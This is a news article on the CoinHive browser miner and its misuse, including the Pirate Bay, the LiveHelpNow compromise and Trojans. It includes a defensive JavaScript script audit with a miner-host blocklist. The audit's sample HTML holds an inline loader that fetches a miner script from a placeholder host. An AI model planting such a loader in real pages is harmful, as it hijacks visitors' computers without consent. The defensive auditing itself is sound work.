The unknown miners: how a single script changes the web

The name CoinHive has been on everyone’s lips for at least two months. This JavaScript miner can be integrated into almost any website in just a few steps in order to use the computing power of visitors’ PCs. The point of criticism is not the mining of Monero (XMR) itself, but the fact that visitors are often not even informed that their hardware is being used. This new form of monetization opens up completely new horizons for both hackers and website operators. Is CoinHive a curse or a blessing?

It all started in mid-September 2017. On Reddit, countless users of the file-sharing site The Pirate Bay complained that the Coinhive JavaScript miner was being used on some of its subpages. The operators tried to appease them: ideally they would do away with online advertising altogether, but they need enough money to operate the site, they wrote in response on the in-house blog.

The Pirate Bay was not the only place where visitors’ CPUs ran hot. The official website of footballer Cristiano Ronaldo and the legal streaming portal Showtime.com of the US broadcaster CBS have also used the mining software in the meantime. The ad blocker maker Adguard estimates that just three weeks after the introduction of the new technology, around 500 million people worldwide were visiting websites every month on which such scripts were used. Most legal providers switched the mining software off after it became public; the illegal ones did not. According to Adguard, the sites most frequently affected by the novel malicious software are streaming sites, file-sharing portals, porn sites and, last but not least, news magazines.

How does crypto mining work?

The idea behind it is as simple as it is ingenious. The more frequently and the longer a website is visited, the greater the yield. Coinhive retains 30% of the mined Monero value; the remainder goes to the operators of the sites. Monero (XMR) is used because mining Bitcoin has not been worthwhile for some time. In addition, CryptoNight, Monero’s algorithm, is perfect for the hardware of normal laptops and desktops. The computing power of graphics cards cannot be used directly from the browser, the makers of Coinhive say in their FAQ. That would be possible, if at all, only through the WebGL programming interface. But that would be hellishly complicated to program, and the mining process would be much too slow and thus unprofitable.

Websites that invite visitors to linger are particularly interesting. In addition to online games, these are mostly traditional forums, where much is discussed and read, or pages on which TV series and movies can be watched. According to calculations by TorrentFreak, The Pirate Bay could earn up to 12,000 US dollars a month from mining alone, provided the script is built into all pages of the torrent indexer and set to the maximum load on the visitor’s CPU. With more than 19.32 million hits per month, that would add up to a lot of money. But the service provider Cloudflare has already responded and thrown out several pirate sites that claimed the hardware of their visitors without their knowledge. No online pirate can afford to be kicked out by Cloudflare, because without this provider’s effective DDoS protection a site is completely defenseless. In addition, Cloudflare obscures the actual location of the web servers to protect them from access by rights holders. But the high revenue expectations are tempting, which is why some portals in the gray area still have their mining scripts activated.

Cybercriminals interpret Coinhive as an invitation

What began as a good idea has also inspired cybercriminals to come up with completely new revenue models. Trend Micro security researchers have already found several apps in the Google Play Store that shipped with this mining software. Although CoinHive’s own site explicitly advises against using the code this way because of the high battery load, it is still done.

Security researcher Troy Mursch from Las Vegas recently uncovered a particularly inventive twist. On Black Friday, the sales day of numerous online shops, the script was hidden in the shop extension LiveHelpNow. According to media sources, this live chat service for e-commerce vendors is used on more than 1,500 websites, among them the British producer Herring Shoes, the US boxing equipment maker Everlast and Micron Technology, the manufacturer of the flash memory brand Crucial. The cybercriminals also took advantage of the public holiday on November 23 in the United States, hoping that most administrators would not notice the intruders until many hours later. So far, it is not clear how LiveHelpNow could be abused for mining Monero.

To name just one more example of unauthorized mining: in the summer of 2017, several Windows PCs were infected with a Trojan that worked on the basis of the NSA backdoor DOUBLEPULSAR. After taking over the PCs, which ran 32- and 64-bit versions of Windows, the malware first checked whether sufficient resources were available for the background calculations. If the CPU was too slow, the Trojan was not installed.

And even the makers of Coinhive themselves seem to reject any responsibility. A spokesman told the P2P blog TorrentFreak that they merely provide the server and their own script. The operators of Coinhive do not consider it their responsibility to check where their customers come from and whether their websites comply with applicable law. They say they do not have the technical resources to do so. Apparently, some hackers have misunderstood this rather progressive attitude as an invitation.

AdBlockers complicate the new business model

Ironically, on websites that report heavily on technical topics, the proportion of ad blocker users is extremely high. Operators of technology-heavy sites have often complained in the past about losses of up to 60% because at least half of their visitors used an ad blocker. If visitors do not see the advertisement, the banner is not paid for. The same applies to all mining scripts, because Adblock Plus & Co. basically suppress the use of JavaScript in order to reduce annoying advertising to zero. Giorgio Maone’s NoScript plug-in focuses on the safety of the surfer, but NoScript also blocks the mining completely. If you want to be in control yourself, the browser Google Chrome offers both a Miner Detector and several Crypto Miner Blockers. Several blockers are also available for Mozilla’s Firefox.
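
The kind of host-based filtering such blockers apply can also be used by a site operator to audit their own pages, for instance after a third-party widget has been tampered with as in the LiveHelpNow case. The following is an added example, not code from any blocker or from Coinhive; the function names, the blocklist and every hostname in it are constructed for illustration.

```javascript
// Added example: simplified host-based filtering as a miner blocker performs it.
// The blocklist entries and all hostnames below are constructed for illustration.
const MINER_BLOCKLIST = ['coinhive.example', 'miner-cdn.example'];

// True if host equals a blocklist entry or is a subdomain of one.
function isBlockedHost(host, blocklist = MINER_BLOCKLIST) {
  host = host.toLowerCase();
  return blocklist.some((d) => host === d || host.endsWith('.' + d));
}

// Collect every <script> in the HTML, resolve its src against the page URL,
// and report third-party hosts and blocklist hits.
function auditScripts(html, pageUrl, blocklist = MINER_BLOCKLIST) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const srcMatch = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(m[1]);
    if (srcMatch) {
      const raw = srcMatch[1] ?? srcMatch[2] ?? srcMatch[3];
      let host;
      try { host = new URL(raw, pageUrl).hostname; } catch { continue; }
      findings.push({ kind: 'external', src: raw, host,
        thirdParty: host !== pageHost, blocked: isBlockedHost(host, blocklist) });
    } else {
      // Inline script: flag it if its body names a blocklisted host.
      const body = m[2].toLowerCase();
      const hit = blocklist.find((d) => body.includes(d));
      findings.push({ kind: 'inline', src: null, host: null,
        thirdParty: false, blocked: Boolean(hit) });
    }
  }
  return findings;
}

// Constructed sample page: the shop's own script, a chat widget, a miner on a
// subdomain of a blocklisted host, and an inline loader.
const SAMPLE_HTML = `
<html><head>
<script src="/js/shop.js"></script>
<script src="https://chat-widget.example/embed.js" async></script>
<script src='//static.coinhive.example/lib/miner.min.js'></script>
<script>var s=document.createElement('script');s.src='https://miner-cdn.example/m.js';document.head.appendChild(s);</script>
</head><body></body></html>`;

const report = auditScripts(SAMPLE_HTML, 'https://shop.example/checkout');
console.log(report.filter((f) => f.blocked));
```

A static scan like this only sees what is in the delivered HTML; a script that a trusted third-party widget fetches at runtime shows up only in the browser's network requests, which is where the blockers mentioned above do their matching.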

Conclusion

Similar to a knife, the miner is a double-edged sword. You can do both good and bad with it. For the maintenance of larger blogs or forums, this new form of community support may play a role in the future. You do not have to overdo it like Cristiano Ronaldo and set the CPU load to the maximum; less will do. And since the release of several WordPress plug-ins at the latest, every webmaster can take part in mining even without any programming knowledge. As long as visitors are informed about this step and can turn it off, there is basically nothing wrong with it.

TheBitcoinNews.com – leading Bitcoin News source since 2012